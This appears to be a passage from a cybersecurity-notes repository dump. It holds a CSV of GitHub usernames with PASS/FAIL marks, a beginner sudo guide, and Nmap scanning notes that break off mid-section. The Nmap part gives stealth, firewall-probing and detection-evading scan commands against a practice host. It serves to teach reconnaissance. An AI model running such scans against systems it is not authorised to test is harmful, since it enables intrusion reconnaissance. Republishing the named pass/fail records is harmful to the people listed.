"alvinjobi4","https://github.com/alvinjobi4",6,"FAIL" 49 | "A-M-K-x","https://github.com/A-M-K-x",2,"FAIL" 50 | "samuelbiju13","https://github.com/samuelbiju13",3,"PASS" 51 | "joshuasantoshh","https://github.com/joshuasantoshh",7,"FAIL" 52 | "RichardRajuChirayath","https://github.com/RichardRajuChirayath",6,"PASS" 53 | "johnevin965","https://github.com/johnevin965",3,"FAIL" 54 | "Sartaj-IT","https://github.com/Sartaj-IT",4,"PASS" 55 | "Sankeeth-23","https://github.com/Sankeeth-23",2,"PASS" 56 | "AvrelPinto","https://github.com/AvrelPinto",7,"PASS" 57 | "vedantjoshi18","https://github.com/vedantjoshi18",6,"PASS" 58 | "Melwin-Thomas","https://github.com/Melwin-Thomas",6,"PASS" 59 | "AlenSaijo","https://github.com/AlenSaijo",5,"PASS" 60 | "JohnJoby2006","https://github.com/JohnJoby2006",11,"PASS" 61 | "Sreesanth200677","https://github.com/Sreesanth200677",9,"PASS" 62 | "Ashweljohn","https://github.com/Ashweljohn",12,"PASS" 63 | "Tiswin-Saji","https://github.com/Tiswin-Saji",8,"PASS" 64 | "BasudevDileep","https://github.com/BasudevDileep",4,"PASS" 65 | "AthreyRaj","https://github.com/AthreyRaj",19,"FAIL" 66 | "hackershay","https://github.com/hackershay",4,"FAIL" 67 | "MichelleDevasia","https://github.com/MichelleDevasia",8,"PASS" 68 | "Angela-Domingo","https://github.com/Angela-Domingo",3,"PASS" 69 | "jessicanalinipaully","https://github.com/jessicanalinipaully",5,"PASS" 70 | "Prash-2402","https://github.com/Prash-2402",4,"FAIL" 71 | "Prisha-11-07","https://github.com/Prisha-11-07",5,"PASS" 72 | "Aksa-006","https://github.com/Aksa-006",4,"PASS" 73 | "SanjanaSudhir","https://github.com/SanjanaSudhir",5,"PASS" 74 | "JoshinyMaria","https://github.com/JoshinyMaria",2,"PASS" 75 | "SriRam-0511","https://github.com/SriRam-0511",2,"PASS" 76 | "Monisha71","https://github.com/Monisha71",3,"PASS" 77 | "JemimahAnna","https://github.com/JemimahAnna",6,"PASS" 78 | "Reuben-Sunish","https://github.com/Reuben-Sunish",6,"PASS" 79 | "maxine-23","https://github.com/maxine-23",7,"PASS" 80 | "Rhea-gracy","https://github.com/Rhea-gracy",8,"PASS" 81 | "Stacydsouza","https://github.com/Stacydsouza",3,"PASS" 82 | "jfs1336","https://github.com/jfs1336",8,"FAIL" 83 | "Tom-boby","https://github.com/Tom-boby",7,"PASS" 84 | "TenzinRigzin2460462","https://github.com/TenzinRigzin2460462",8,"PASS" 85 | "AntonyPraveenReddyK","https://github.com/AntonyPraveenReddyK",12,"FAIL" 86 | "aadithyavimal-christ","https://github.com/aadithyavimal-christ",4,"PASS" 87 | "jonac77","https://github.com/jonac77",7,"PASS" 88 | "diyasusan-coder","https://github.com/diyasusan-coder",7,"PASS" 89 | "Fariha006","https://github.com/Fariha006",7,"PASS" 90 | "LeoRineeth","https://github.com/LeoRineeth",9,"FAIL" 91 | "ArthurFigrous","https://github.com/ArthurFigrous",6,"FAIL" 92 | "SonalJoy10","https://github.com/SonalJoy10",9,"PASS" 93 | "RAAPPO","https://github.com/RAAPPO",8,"PASS" 94 | "bigdaddy110","https://github.com/bigdaddy110",3,"FAIL" 95 | "BarathCG","https://github.com/BarathCG",4,"PASS" 96 | "AmanVarunEkka","https://github.com/AmanVarunEkka",3,"PASS" 97 | "GOKUL06092006","https://github.com/GOKUL06092006",6,"PASS" 98 | "Abishek-gitit","https://github.com/Abishek-gitit",10,"PASS" 99 | "Ridhi105","https://github.com/Ridhi105",3,"PASS" 100 | "MINEAMICHEAL","https://github.com/MINEAMICHEAL",5,"PASS" 101 | "Prajin-30","https://github.com/Prajin-30",4,"PASS" 102 | "Tenzin-Choeying1","https://github.com/Tenzin-Choeying1",6,"FAIL" 103 | "elizamiriampaul","https://github.com/elizamiriampaul",3,"PASS" 104 | "lijo6666","https://github.com/lijo6666",3,"PASS" 105 | "moonknight96","https://github.com/moonknight96",2,"FAIL" 106 | "Istiaq-Alam","https://github.com/Istiaq-Alam",52,"FAIL" -------------------------------------------------------------------------------- /Sudo Usage Guide L1.md: -------------------------------------------------------------------------------- 1 | # Sudo Command Guide for Beginners (L1 Level) 2 | 3 | This document provides a complete beginner-friendly guide to understanding and using the `sudo` command in Linux-based systems. It is tailored for Level 1 (L1) learners and junior cybersecurity/system administration professionals. 4 | 5 | --- 6 | 7 | ## What is `sudo`? 8 | 9 | `sudo` stands for "superuser do". It allows a permitted user to execute a command as the superuser or another user, as specified by the security policy (usually `/etc/sudoers`). 10 | 11 | **Use Case:** It is used to perform administrative tasks without switching to the root account. 12 | 13 | --- 14 | 15 | ## Why is `sudo` Important? 16 | 17 | * Maintains system security by limiting root access 18 | * Tracks which user ran privileged commands (audit-friendly) 19 | * Prevents mistakes by enforcing controlled access to powerful commands 20 | * Encourages least privilege principle 21 | 22 | --- 23 | 24 | ## Syntax of `sudo` 25 | 26 | ```bash 27 | sudo [option] [command] 28 | ``` 29 | 30 | **Example:** 31 | 32 | ```bash 33 | sudo apt update 34 | ``` 35 | 36 | This updates the package list using elevated permissions. 37 | 38 | --- 39 | 40 | ## Common `sudo` Command Examples 41 | 42 | | Task | Command | Scenario | 43 | | ---------------- | -------------------------------- | -------------------------------- | 44 | | Update packages | `sudo apt update` | Keeping system packages updated | 45 | | Install software | `sudo apt install nmap` | Installing a new tool like Nmap | 46 | | Edit system file | `sudo nano /etc/hosts` | Modify system-level config files | 47 | | Reboot system | `sudo reboot` | Restarting system remotely | 48 | | Change ownership | `sudo chown user:group file.txt` | Grant ownership of a file | 49 | | Add a user | `sudo useradd devuser` | Add new user to system | 50 | 51 | --- 52 | 53 | ## Workflow of `sudo` 54 | 55 | 1. **User types command with `sudo`** 56 | 2. **System checks `/etc/sudoers` for permission** 57 | 3. **If permitted, the system prompts for the user’s password** 58 | 4. **If password is correct and permission granted, command runs as root** 59 | 5. **Audit logs are updated with execution details** 60 | 61 | --- 62 | 63 | ## Configure `sudo` Access 64 | 65 | ### Step 1: Add user to `sudo` group (Debian/Ubuntu) 66 | 67 | ```bash 68 | sudo usermod -aG sudo username 69 | ``` 70 | 71 | ### Step 2: Verify 72 | 73 | ```bash 74 | sudo -l 75 | ``` 76 | 77 | Shows what commands the user is allowed to run with sudo. 78 | 79 | --- 80 | 81 | ## Creating Users: With and Without `sudo` 82 | 83 | ### Scenario A: Create a regular user **with** `sudo` 84 | 85 | ```bash 86 | sudo adduser devadmin 87 | sudo usermod -aG sudo devadmin 88 | ``` 89 | 90 | This user can now use `sudo`. 91 | 92 | ### Scenario B: Create a regular user **without** `sudo` 93 | 94 | ```bash 95 | sudo adduser internuser 96 | ``` 97 | 98 | This user cannot run administrative commands unless explicitly added to `sudo` group. 99 | 100 | --- 101 | 102 | ## Best Practices 103 | 104 | * Use `sudo` only when necessary 105 | * Avoid running full shells as root: `sudo -i` or `sudo su` 106 | * Monitor `/var/log/auth.log` for sudo activities 107 | * Configure minimal privilege using `visudo` 108 | 109 | --- 110 | 111 | ## Enabling `sudo` Usage Tracking and Monitoring 112 | 113 | Monitoring `sudo` usage is critical for auditing and maintaining security. Here’s how to enable and track sudo activities in a simple way: 114 | 115 | ### 1. View Sudo Logs 116 | 117 | ```bash 118 | sudo cat /var/log/auth.log | grep sudo 119 | ``` 120 | 121 | **Purpose**: Displays all sudo activity including who used it and what command was run. 122 | 123 | ### 2. Tail Sudo Logs in Real Time 124 | 125 | ```bash 126 | sudo tail -f /var/log/auth.log | grep sudo 127 | ``` 128 | 129 | **Purpose**: Continuously monitor sudo usage as it happens. 130 | 131 | ### 3. Add a Sudo Log Alias (Optional for L1) 132 | 133 | Edit `.bashrc` to add: 134 | 135 | ```bash 136 | alias sudolog='grep sudo /var/log/auth.log' 137 | ``` 138 | 139 | Then reload: 140 | 141 | ```bash 142 | source ~/.bashrc 143 | ``` 144 | 145 | **Purpose**: Simplifies checking sudo logs with `sudolog` command. 146 | 147 | ### 4. Audit With `ausearch` (If auditd is enabled) 148 | 149 | ```bash 150 | sudo ausearch -m USER_CMD -x sudo 151 | ``` 152 | 153 | **Purpose**: Queries auditd logs for all sudo commands. 154 | 155 | > Note: `auditd` may need to be installed and started for this to work: 156 | 157 | ```bash 158 | sudo apt install auditd 159 | sudo systemctl enable auditd && sudo systemctl start auditd 160 | ``` 161 | 162 | --- 163 | 164 | ## `sudo` vs `su` 165 | 166 | | Feature | `sudo` | `su` | 167 | | --------------------------- | ------ | ---------------------- | 168 | | Runs single command as root | ✅ | ❌ | 169 | | Requires user’s password | ✅ | ❌ (asks root password) | 170 | | Audit logging | ✅ | ❌ | 171 | | Temporary root shell | ❌ | ✅ | 172 | 173 | --- 174 | 175 | ## Grant Limited `sudo` Access (Example) 176 | 177 | To allow a user to run only the reboot command: 178 | 179 | ```bash 180 | sudo visudo 181 | ``` 182 | 183 | Add this line: 184 | 185 | ```bash 186 | username ALL=(ALL) NOPASSWD: /sbin/reboot 187 | ``` 188 | 189 | --- 190 | 191 | ## Troubleshooting `sudo` 192 | 193 | | Issue | Cause | Resolution | 194 | | --------------------------------- | ------------------------- | --------------------------------- | 195 | | `user is not in the sudoers file` | Not part of `sudo` group | Use root to add user to group | 196 | | `command not found` | Misspelled or uninstalled | Double-check spelling and path | 197 | | `Permission denied` | Wrong file permissions | Use `ls -l` and correct ownership | 198 | 199 | --- 200 | 201 | ## Conclusion 202 | 203 | Understanding `sudo` is critical for L1 Linux and cybersecurity practitioners. It enforces control, improves auditability, and limits damage from mistakes. Learn to use it wisely. 204 | 205 | --- 206 | 207 | Maintained by: **[Vaishnavu C V](https://github.com/vaishnavucv)** 208 | Principal CyberSecurity Engineer | Ethical Hacker | Cyber Range Mentor 209 | -------------------------------------------------------------------------------- /Nmap Command Notes L1, L2 and L3.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Notes Repository 2 | 3 | Welcome to the `cybersecurity-note` repository. This repository serves as a foundational knowledge base for cybersecurity learners, enthusiasts, and professionals. This document specifically covers **Nmap Command Notes**, focusing on its usage and command-line options relevant for L1 (Beginner), L2 (Intermediate), and L3 (Advanced) cybersecurity professionals. 4 | 5 | --- 6 | 7 | ## 🛠 Nmap Command Notes: L1-L2-L3 (Beginner Focused with Examples) 8 | 9 | ### 1. 🎯 TARGET SPECIFICATION 10 | 11 | * `-iL `: Input target list from a file 12 | 13 | ```cmd 14 | nmap -iL targets.txt 15 | ``` 16 | 17 | **Scenario**: You have multiple IPs or domains in a file (`targets.txt`) and want to scan all of them at once. 18 | 19 | ### 2. 🌐 HOST DISCOVERY 20 | 21 | * `-sL`: List Scan – list targets only 22 | 23 | ```cmd 24 | nmap -sL zero.webappsecurity.com 25 | ``` 26 | 27 | **Scenario**: Just check the hostname resolution for review, without scanning ports. 28 | 29 | * `-sn`: Ping Scan – check if host is up, no ports scanned 30 | 31 | ```cmd 32 | nmap -sn zero.webappsecurity.com 33 | ``` 34 | 35 | **Scenario**: Confirm if the host is live before deeper scanning. 36 | 37 | * `-Pn`: Assume host is up, skip ping check 38 | 39 | ```cmd 40 | nmap -Pn zero.webappsecurity.com 41 | ``` 42 | 43 | **Scenario**: Use when host blocks ICMP/ping (still want port scan). 44 | 45 | ### 3. ⚙️ SCAN TECHNIQUES 46 | 47 | * `-sS`: TCP SYN scan (stealth scan) 48 | 49 | ```cmd 50 | nmap -sS zero.webappsecurity.com 51 | ``` 52 | 53 | **Scenario**: Identify open ports without completing TCP handshake. 54 | 55 | * `-sT`: TCP connect scan 56 | 57 | ```cmd 58 | nmap -sT zero.webappsecurity.com 59 | ``` 60 | 61 | **Scenario**: Useful if you're running as a normal user (non-root). 62 | 63 | * `-sA`: ACK scan 64 | 65 | ```cmd 66 | nmap -sA zero.webappsecurity.com 67 | ``` 68 | 69 | **Scenario**: Check firewall rules or filtering behavior. 70 | 71 | * `-sU`: UDP scan 72 | 73 | ```cmd 74 | nmap -sU zero.webappsecurity.com 75 | ``` 76 | 77 | **Scenario**: Identify open UDP services (like DNS, SNMP). 78 | 79 | ### 4. 🚪 PORT SPECIFICATION AND SCAN ORDER 80 | 81 | * `-p `: Scan specific ports 82 | 83 | ```cmd 84 | nmap -p 80,443 zero.webappsecurity.com 85 | ``` 86 | 87 | **Scenario**: Limit scan to known web service ports. 88 | 89 | * `--exclude-ports `: Skip specific ports 90 | 91 | ```cmd 92 | nmap --exclude-ports 22,25 zero.webappsecurity.com 93 | ``` 94 | 95 | **Scenario**: Avoid scanning SSH and mail ports. 96 | 97 | * `-F`: Fast scan (limited ports) 98 | 99 | ```cmd 100 | nmap -F zero.webappsecurity.com 101 | ``` 102 | 103 | **Scenario**: Quick scan of the most common ports. 104 | 105 | * `-r`: Scan ports sequentially 106 | 107 | ```cmd 108 | nmap -r zero.webappsecurity.com 109 | ``` 110 | 111 | **Scenario**: Avoid randomization for analysis or teaching purposes. 112 | 113 | ### 5. 🔍 SERVICE/VERSION DETECTION 114 | 115 | * `-sV`: Detect service versions 116 | 117 | ```cmd 118 | nmap -sV zero.webappsecurity.com 119 | ``` 120 | 121 | **Scenario**: Understand what software/version is running on open ports. 122 | 123 | * `--version-intensity ` 124 | 125 | ```cmd 126 | nmap -sV --version-intensity 2 zero.webappsecurity.com 127 | ``` 128 | 129 | **Scenario**: Perform lighter version detection to avoid detection. 130 | 131 | * `--version-light` 132 | 133 | ```cmd 134 | nmap -sV --version-light zero.webappsecurity.com 135 | ``` 136 | 137 | **Scenario**: Use the most common probes only. 138 | 139 | * `--version-all` 140 | 141 | ```cmd 142 | nmap -sV --version-all zero.webappsecurity.com 143 | ``` 144 | 145 | **Scenario**: Perform a full and deep version probe. 146 | 147 | * `--version-trace` 148 | 149 | ```cmd 150 | nmap -sV --version-trace zero.webappsecurity.com 151 | ``` 152 | 153 | **Scenario**: See how Nmap tries to identify each service. 154 | 155 | ### 6. 📜 SCRIPT SCAN 156 | 157 | * `-sC`: Run default scripts 158 | 159 | ```cmd 160 | nmap -sC zero.webappsecurity.com 161 | ``` 162 | 163 | **Scenario**: Run built-in checks (like SSH version, HTTP headers). 164 | 165 | * `--script=